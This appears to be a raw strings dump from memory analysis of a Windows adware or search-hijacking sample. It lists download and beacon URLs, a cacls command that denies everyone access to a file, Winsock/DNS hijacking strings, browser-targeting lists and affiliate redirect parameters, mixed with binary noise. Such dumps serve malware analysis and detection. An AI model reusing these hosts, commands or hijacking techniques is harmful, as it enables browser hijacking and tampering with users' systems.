OnDownOk m_TaskMutex[%d].Name=X Peer:%d.%d.%d.%d:%d
OnLockOver m_TaskMutex[%d].Name=X %s
m_TaskMutex[%d]->hDownThread=X
DownLoad(%d)
OnDownLoadOver Status:%d
Begin:X m_Item:X m_run:X m_End:X
FILE_TYPE_EXE cfg_idx:%d
FILE_TYPE_CFG bin_idx:%d
OnDownLoadModuleOver(X,%d) file_type:%d
index:%d time_out:%d down_time:M-d-d d:d:d
OnDownLoadCfgOver(X,%d)
cfg_md5: %s
cfg_url: %s
md5 : %s
url : %s
cfg_url
group:[%s]
idx:%d igroup:%d
Add Cfg Mutex:%s
Add Copy Cfg Mutex:%s
Add Bin Mutex:%s
Add Copy Bin Mutex:%s
Call End Fun:X ret:%d
NotInit:%d LockCount:%d NotRun:%d m_TaskMutex.size()=%d
NotInit:%d LockCount:%d NotRun:%d
zcÁ
%WinDir%\share\
58lm/temptation.bin
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetCPInfo
RegCreateKeyExA
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyA
RegCloseKey
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
iphlpapi.dll
PSAPI.DLL
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WS2_32.dll
P2PDLL.dll
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
MSAFD Tcpip [RAW/IP]
RSVP UDP Service Provider
\Device\NetBT_Tcpip
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2
tv_w32.dll
indicdll.dll
mshtml.dll
shell32.dll
msctfime.ime
msctf.dll
uxtheme.dll
RegQueryValueExW %s
RegOpenKeyExW:%s
RegisterWindowMessageW:%s

objs.exe_3332:




E.LLPlD'*
__MSVCRT_HEAP_SELECT
user32.dll
inflate 1.2.3 Copyright 1995-2005 Mark Adler
OLEACC.dll
PSAPI.DLL
phlpapi.dll
127.0.0.1
msvcrt
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
http://get.woai310.com/getconfig/minisite.ini
Content-Type: application/x-www-form-urlencoded
http://
WebClientWindow
WebBrowserPointer
http://site.minimenhu.com/sh/index.html
%WinDir%\share\rsvp\objs.exe
GetProcessHeap
GetCPInfo
UrlUnescapeA
EnumChildWindows
EnumWindows
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
O.qul5
KERNEL32.DLL
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WS2_32.dll

EXE_temp3.exe_816_rwx_00401000_0008D000:




__MSVCRT_HEAP_SELECT
user32.dll
USER32.dll
58lm/temptation.bin
.IUQT
[.aoH
[8~%xs
 .oN7
z.Tl&
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data

EXE_temp3.exe_816_rwx_00DC0000_00053000:




__MSVCRT_HEAP_SELECT
inflate 1.2.3 Copyright 1995-2005 Mark Adler
iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
explorer.exe
igfxsrvc.exe
{5D562E5F-741F-4b50-AB7B-7A997CEB9557}
{XXXX-XX-XX-XX-XXXXXX}
cacls.exe "%s" /e /d everyone
%Program Files%\E-yoo\EyooSechelper2.dll
http://
XXXXXXXXXXXXXXXX
Software\Microsoft\Windows\ShellNoRoam\TempCache
Software\Microsoft\Windows\ShellNoRoam\ShellCache
herollq.exe
WebPlayer2010.exe
VODPlayer.exe
JSKPBrowser.exe
ValeBrowser.exe
wmconfig.exe
NewBho.DLL
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object
software\policies\microsoft\windows nt\dnsclient
ws2_32.dll
ole32.dll
ieui.dll
mshtml.dll
IEFrame.dll
iertutil.dll
User32.dll
SHLWAPI.dll
wininet.dll
urlmon.dll
mswsock.dll
ws2help.dll
RegOpenKeyExA
RegOpenKeyExW
NtQueryValueKey
NtOpenKey
ADVAPI32.dll
ntdll.dll
Kernel32.dll
dnsapi.dll
msvcrt
PubwinClient.exe
RunMe.exe
{11F09AFE-75AD-4E52-AB43-E09E9351CE17}
Shell.User\Group
oleaut32.dll
browseti.dll
hinthk.dll
zclm8.com
wq581.com
maimeng8.com
5sla.com
wb360.net
renren.com
jj123.com.cn
wb12318.com
iwb110.com
woai310.com
http://123.sogou.com
http://www.sogou.com/sogou
http://www.sogou.com/index
.info
http://baidu.com
{X-X-x-XX-XXXXXX}
www.soso.com
www.google.com
www.hao123.com
www.tao123.com
www.baidu.com
123.sogou.com
www.sogou.com
www.iwb110.com
rpcrt4.dll
kernel32.dll
{xxxx-xx-xx-xx-xxxxxx}
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.8.9
8.8.4.4
Shell.Dusn
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
ZwQueryValueKey
ZwOpenKey
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
xxxxxx
http://www.baidu.com/adrc.php?
http://www.baidu.com/baidu.php?
http://www.baidu.com/s?
http://www.hao123.com/?
http://123.sogou.com/?
http://www.sogou.com/img/fav.ico?
http://pv.sogou.com/pv.gif?
http://pb.sogou.com/pv.gif?
http://pb.sogou.com/cl.gif?
http://www.google.com/aclk?
http://www.sogou.com/bill_
http://www.sogou.com/sogou?
http://test.hermes.sogou.com/sa.gif?
http://www.sogou.com/index.htm
118.145.16.80
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
000000000011
000000000010
000000000009
000000000008
000000000007
000000000006
000000000005
000000000004
000000000003
000000000002
000000000001
shdocvw.dll
ieframe.dll
http://www.sogou.com/sogou?query=
sogou-netb-xx-d
%%X
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeaders
\StringFileInfo\xx\%s
user32.dll
6.0.2800.1106
6.00.2600.0000
6.00.2600.0000 (xpclient.010817-1148)
6.00.2737.800
6.00.2800.1106
6.00.2800.1106 (xpsp1.020828-1920)
6.00.2800.1400
6.00.2800.1485
6.00.2800.1496
6.00.2800.1603
6.00.2800.1607
6.00.2800.1611
6.00.2800.1615
6.00.2800.1617
6.00.2800.1623
6.00.2800.1627
6.00.2800.1632
6.00.2800.1644
6.00.2800.1649
6.00.2800.1650
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
6.00.2900.2518 (xpsp.040919-1030)
6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)
6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)
6.00.2900.2598 (xpsp.041130-1728)
6.00.2900.2627 (xpsp.050309-1719)
6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
6.00.2900.2668 (xpsp.050430-1553)
6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)
6.00.2900.2713 (xpsp.050702-1518)
6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)
6.00.2900.2753 (xpsp.050902-1331)
6.00.2900.2781 (xpsp.051020-1728)
6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)
6.00.2900.2823 (xpsp.060106-1527)
6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)
6.00.2900.2861 (xpsp.060303-1528)
6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)
6.00.2900.2904 (xpsp.060509-0230)
6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)
6.00.2900.2937 (xpsp.060623-0011)
6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)
6.00.2900.2995 (xpsp.060913-0019)
6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)
6.00.2900.3020 (xpsp.061023-0222)
6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)
6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)
6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)
6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)
6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)
6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)
6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)
6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)
6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)
6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)
6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)
6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)
6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)
6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)
6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)
6.00.2900.3300 (xpsp.080125-2028)
6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)
6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)
6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)
6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)
6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)
6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)
6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)
6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)
6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)
6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)
6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)
6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)
6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)
6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)
6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)
6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)
6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)
6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)
6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)
6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)
6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)
6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)
6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)
6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)
6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)
6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)
6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)
6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)
6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)
6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)
6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)
6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)
6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)
6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)
6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)
6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)
6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)
6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)
6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)
6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)
6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)
6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)
6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)
6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)
6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)
6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)
6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)
6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)
6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)
6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)
6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)
6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)
6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)
6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)
6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)
6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)
6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)
6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)
6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)
6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)
6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)
6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)
6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)
6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)
6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)
6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)
6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)
6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)
6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)
6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)
6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)
6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)
6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)
6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)
6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)
6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)
6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)
6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)
6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)
6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)
6.00.3790.0 (srv03_rtm.030324-2048)
6.00.3790.118 (srv03_gdr.031205-1652)
6.00.3790.118 (srv03_qfe.031205-1652)
6.00.3790.1830 (srv03_sp1_rtm.050324-1447)
6.00.3790.186 (srv03_gdr.040410-1234)
6.00.3790.186 (srv03_qfe.040410-1236)
6.00.3790.2509 (srv03_sp1_gdr.050815-1517)
6.00.3790.2653 (srv03_sp1_gdr.060303-1536)
6.00.3790.2653 (srv03_sp1_qfe.060303-1552)
6.00.3790.2732 (srv03_sp1_gdr.060623-0310)
6.00.3790.2732 (srv03_sp1_qfe.060623-0318)
6.00.3790.2817 (srv03_sp1_gdr.061023-0100)
6.00.3790.2993 (srv03_sp1_gdr.070817-1316)
6.00.3790.2993 (srv03_sp1_qfe.070817-1316)
6.00.3790.3041 (srv03_sp1_gdr.071107-1901)
6.00.3790.3041 (srv03_sp1_qfe.071107-1901)
6.00.3790.3091 (srv03_sp1_gdr.080215-1206)
6.00.3790.3091 (srv03_sp1_qfe.080215-1206)
6.00.3790.3194 (srv03_sp1_gdr.080819-1207)
6.00.3790.3194 (srv03_sp1_qfe.080819-1207)
6.00.3790.3229 (srv03_sp1_gdr.081016-1620)
6.00.3790.3229 (srv03_sp1_qfe.081016-1620)
6.00.3790.3304 (srv03_sp1_gdr.090303-1204)
6.00.3790.3304 (srv03_sp1_qfe.090303-1204)
6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
6.00.3790.4186 (srv03_sp2_gdr.071108-1306)
6.00.3790.4186 (srv03_sp2_qfe.071108-1306)
6.00.3790.4210 (srv03_sp2_qfe.071221-1418)
6.00.3790.4237 (srv03_sp2_gdr.080215-1206)
6.00.3790.4237 (srv03_sp2_qfe.080215-1206)
6.00.3790.4275 (srv03_sp2_gdr.080417-1307)
6.00.3790.4275 (srv03_sp2_qfe.080417-1307)
6.00.3790.4324 (srv03_sp2_qfe.080630-1205)
6.00.3790.4357 (srv03_sp2_gdr.080819-1207)
6.00.3790.4357 (srv03_sp2_qfe.080819-1207)
6.00.3790.4392 (srv03_sp2_gdr.081016-1620)
6.00.3790.4392 (srv03_sp2_qfe.081016-1620)
6.00.3790.4470 (srv03_sp2_gdr.090303-1204)
6.00.3790.4470 (srv03_sp2_qfe.090303-1204)
6.00.3790.4504 (srv03_sp2_gdr.090428-1405)
6.00.3790.4504 (srv03_sp2_qfe.090428-1405)
6.00.3790.4539 (srv03_sp2_gdr.090626-1428)
6.00.3790.4539 (srv03_sp2_qfe.090626-1428)
6.00.3790.4589 (srv03_sp2_gdr.090914-1233)
6.00.3790.4589 (srv03_sp2_qfe.090914-1233)
6.00.3790.4672 (srv03_sp2_gdr.100225-1230)
6.00.3790.4672 (srv03_sp2_qfe.100225-1230)
6.00.3790.4696 (srv03_sp2_gdr.100419-1942)
6.00.3790.4732 (srv03_sp2_gdr.100623-0356)
6.00.3790.4732 (srv03_sp2_qfe.100623-0356)
6.00.3790.4772 (srv03_sp2_gdr.100908-1010)
6.00.3790.4772 (srv03_sp2_qfe.100908-1010)
6.00.3790.4795 (srv03_sp2_qfe.101103-0357)
6.00.3790.4807 (srv03_sp2_gdr.101220-0307)
6.00.3790.4807 (srv03_sp2_qfe.101220-0307)
6.00.3790.4835 (srv03_sp2_gdr.110222-0239)
6.00.3790.4835 (srv03_sp2_qfe.110222-0239)
6.00.3790.4857 (srv03_sp2_gdr.110425-0335)
6.00.3790.4857 (srv03_sp2_qfe.110425-0335)
6.00.3790.4879 (srv03_sp2_gdr.110621-0342)
6.00.3790.4879 (srv03_sp2_qfe.110621-0342)
6.00.3790.4904 (srv03_sp2_gdr.110905-0334)
6.00.3790.4904 (srv03_sp2_qfe.110905-0334)
6.00.3790.4929 (srv03_sp2_gdr.111104-0342)
6.00.3790.4929 (srv03_sp2_qfe.111104-0342)
6.00.3790.4944 (srv03_sp2_gdr.111216-0308)
6.00.3790.4944 (srv03_sp2_qfe.111216-0308)
6.00.3790.4969 (srv03_sp2_gdr.120228-0234)
6.00.3790.4969 (srv03_sp2_qfe.120228-0234)
6.00.3790.5004 (srv03_sp2_gdr.120515-0336)
6.00.3790.5004 (srv03_sp2_qfe.120515-0336)
6.00.3790.5029 (srv03_sp2_gdr.120628-0335)
6.00.3790.5029 (srv03_sp2_qfe.120628-0335)
6.00.3790.5060 (srv03_sp2_gdr.120824-0334)
6.00.3790.5060 (srv03_sp2_qfe.120824-0334)
6.00.3790.5080 (srv03_sp2_gdr.121026-1534)
6.00.3790.5080 (srv03_sp2_qfe.121026-1534)
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/
%System%\DqKgbb.dll
{6795ED75-58AA-8E4C-A8EA-3CAD7C47AB03}
GetProcessHeap
WinExec
GetCPInfo
RegDeleteKeyA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyA
RegOpenKeyA
RegCloseKey
UrlUnescapeA
EnumWindows
SetWindowsHookExA
EnumChildWindows
InternetCanonicalizeUrlA
InternetCrackUrlA
`.rdata
@.data
.reloc
KERNEL32.DLL
iphlpapi.dll
OLEAUT32.dll
PSAPI.DLL
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
Loader.dll
{9a4dda61-1d3a-49b7-9849-dac6cd30a393}
AutoConfigURL
_IID_IWEBBROWSER
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
MSAFD Tcpip [RAW/IP]
RSVP UDP Service Provider
\Device\NetBT_Tcpip
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2
ikeeper.dll
rsvpsp.dll
nwprovau.dll
winrnr.dll

EXE_temp3.exe_816_rwx_00E50000_0006F000:




__MSVCRT_HEAP_SELECT
user32.dll
HTTP/1.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
uncompress res:%d des_len:%d
uncompress x:X src_len:%d des_len:%d
uncompress crc:X X
WINDOWS
iexplore.exe 360se.exe miniie.exe TangoWeb.exe sogouexplorer.exe TheWorld.exe maxthon.exe baidubrowser.exe browser.exe
.exe ruiying.exe yiyun.exe
, X
Invoke hr:X nArgErr:%d
GetIDsOfNames:%s hr:X dispID:%d
hProcess:X %d
cmd:%s
SetCreateParentProcessId:X
%d.%d.%d
UDP_PROTO_VER
TCP_PROTO_VER
%d.%d.%d.%d
init my_ip_addr: %d.%d.%d.%d
IP: %d.%d.%d.%d
item my_ip_addr: %d.%d.%d.%d
item hWnd:X user:%s
cmd_ip
cmd_user
cmd_ps
cmd_region
BHOLoader_InitDll Result:%d
LoaderCmdLine:%s
.webkjs
Shell.User\BKK
CreateExeShortcut hr:%d
iexplore.exe
start ret:%d
start:X
is_bholoader:%d enter:%s loaddll:%s
Shell.User
Shell.User\Group
" link="http://www.sogou.com/sogou?pid=%s&query=%%s" icon="207" />
param:%s
[%s],
call entry ret:%d
entry addr:X %s
%s addr:X %s
(%d).%s
run_rate :%d
ip_addr :%s
ngroup :%d
cfg_file :%s
bin_file :%s
root_path:%s
igroup :%d
ini :X
kvs :X
gkvs :X
user :%s
hWnd :X
%s%sX%s
CreateExeShortcut Save To:%s
CreateExeShortcut nIndex:%d
CreateExeShortcut pszArgs:%s
CreateExeShortcut pszExeFile:%s
CreateExeShortcut pszWorkerDir:%s
CreateExeShortcut pszDescription:%s
CreateExeShortcut QueryInterface IID_IPersistFile ok
CreateExeShortcut pLink:X
PostClientInfo_Thread:X
,bRet:%d StatusCode:%d
www.dskjkl.com
First_PostClientInfo_Thread:X
/sp/callnew.aspx?
www.58lianmeng.com
XXXXXXXXXXXXXXXX
ddddddd
010203040506
.text
`.bss
.rdata
@.data
.reloc
KERNEL32.dll
.rsrc
.data
kernel32.dll
PEPack.dll
%s : X
More information: http://www.ibsensoftware.com/
3<3q3
GetProcAddress PackTheFile OK Addr:X
GetProcAddress SetFlags OK Addr:X
kind:X posguid:X
MSFT_TypeInfoBase Size:%d
MSFT_Header Size:X
bGetClsID:%d bGetIID:%d
GetClsIDAndIIDFromModuleHandle bRet:%d
TypeLib Res size:%d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
RegCloseKey
RegCreateKeyA
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
`.rdata
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WININET.dll
P2PRun.dll

EXE_temp3.exe_816_rwx_00ED0000_00009000:




.text
`.bss
.rdata
@.data
.reloc
KERNEL32.dll
.rsrc
.data
kernel32.dll
PEPack.dll
%s : X
More information: http://www.ibsensoftware.com/
3<3q3

EXE_temp3.exe_816_rwx_010E1000_00031000:




__MSVCRT_HEAP_SELECT
user32.dll
USER32.dll
ADVAPI32.dll
PSAPI.DLL
Length:%d opcode X offset:%d
lnc.HtM
.sOE?
S.py.q|8X
f:MSG
%S-v,
;/K.CV
7.tajD
.vvn|
.5!.gk
KERNEL32.DLL
GDI32.dll
iphlpapi.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
UrlUnescapeA
InternetCrackUrlA
DeskIcon.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
.rsrc
Z.WrR
.OD'qg
x%X@0
COMCTL32.dll
MFC42.DLL
MSVCP60.dll
MSVCRT.dll
OLEAUT32.dll
VERSION.dll
RegOpenKeyA
GetCPInfo
.text
`.rdata
@.data
@.reloc
Microsoft(R) Windows(R) Operating System
6, 0, 2900, 5512
6.00.2900.5512

EXE_temp3.exe_816_rwx_01120000_00023000:




lnc.HtM
__MSVCRT_HEAP_SELECT
user32.dll
-id:%u -cfg:%s
%u=%s
%s%s.ico
http://www.58lianmeng.com/sp/call.aspx?username=
http://icon.woai310.com/client/config.ini
%s%s.exe
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
xxxxxx
_WINICOMSG_
ATL:X
127.0.0.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
http://s.click.taobao.com/t_js?tu=
detail.tmall.com
application/x-www-form-urlencoded
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
http://icon.woai310.com/?do=post&u=%s&m=%s&c=%d&s=%d&k=1&r=%s&v=%s&p=%s
%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetCPInfo
GetProcessHeap
UrlUnescapeA
InternetCanonicalizeUrlA
InternetCrackUrlA
.QQzH
.text
`.rdata
@.data
.reloc
.5!.gk
KERNEL32.DLL
ADVAPI32.dll
GDI32.dll
iphlpapi.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WS2_32.dll
DeskIcon.dll

EXE_temp3.exe_816_rwx_10001000_0002E000:




__MSVCRT_HEAP_SELECT
user32.dll
PSAPI.DLL
i4VO.Wn}}4
uJ 9%d
s%F'`f
vp%Cl }F.
.Lu.-$ A
>%FZ7~
.DcPn%*
HN6.QK
KERNEL32.DLL
ADVAPI32.dll
iphlpapi.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
Loader.dll
Base:X
DLL_PROCESS_ATTACH %d
Length:%d opcode X offset:%d
MsgDebugView
%System%\DqKgbb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.reloc

objs.exe_3332_rwx_00401000_0001E000:




__MSVCRT_HEAP_SELECT
user32.dll
inflate 1.2.3 Copyright 1995-2005 Mark Adler
OLEACC.dll
PSAPI.DLL
phlpapi.dll
127.0.0.1
msvcrt
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
http://get.woai310.com/getconfig/minisite.ini
Content-Type: application/x-www-form-urlencoded
http://
WebClientWindow
WebBrowserPointer
http://site.minimenhu.com/sh/index.html
%WinDir%\share\rsvp\objs.exe
GetProcessHeap
GetCPInfo
UrlUnescapeA
EnumChildWindows
EnumWindows
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
O.qul5

objs.exe_3332_rwx_00950000_00053000:




__MSVCRT_HEAP_SELECT
inflate 1.2.3 Copyright 1995-2005 Mark Adler
iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
explorer.exe
igfxsrvc.exe
{5D562E5F-741F-4b50-AB7B-7A997CEB9557}
{XXXX-XX-XX-XX-XXXXXX}
cacls.exe "%s" /e /d everyone
%Program Files%\E-yoo\EyooSechelper2.dll
http://
XXXXXXXXXXXXXXXX
Software\Microsoft\Windows\ShellNoRoam\TempCache
Software\Microsoft\Windows\ShellNoRoam\ShellCache
herollq.exe
WebPlayer2010.exe
VODPlayer.exe
JSKPBrowser.exe
ValeBrowser.exe
wmconfig.exe
NewBho.DLL
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object
software\policies\microsoft\windows nt\dnsclient
ws2_32.dll
ole32.dll
ieui.dll
mshtml.dll
IEFrame.dll
iertutil.dll
User32.dll
SHLWAPI.dll
wininet.dll
urlmon.dll
mswsock.dll
ws2help.dll
RegOpenKeyExA
RegOpenKeyExW
NtQueryValueKey
NtOpenKey
ADVAPI32.dll
ntdll.dll
Kernel32.dll
dnsapi.dll
msvcrt
PubwinClient.exe
RunMe.exe
{11F09AFE-75AD-4E52-AB43-E09E9351CE17}
Shell.User\Group
oleaut32.dll
browseti.dll
